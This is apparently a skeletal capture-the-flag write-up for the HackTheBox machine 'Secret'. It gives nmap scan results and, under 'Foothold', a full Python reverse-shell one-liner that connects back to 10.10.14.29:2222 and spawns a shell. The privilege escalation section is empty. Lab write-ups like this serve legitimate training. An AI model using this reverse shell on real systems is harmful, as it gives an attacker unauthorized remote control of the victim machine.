HackTheBox-Secret

NMAP

PORT     STATE SERVICE REASON         VERSION       
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: DUMB Docs
3000/tcp open http syn-ack ttl 63 Node.js (Express middleware)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: DUMB Docs
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80/3000 (HTTP)

Foothold

python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.29",2222));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

Privilege Escalation

References

Pentester | CTF Player

ARZ101
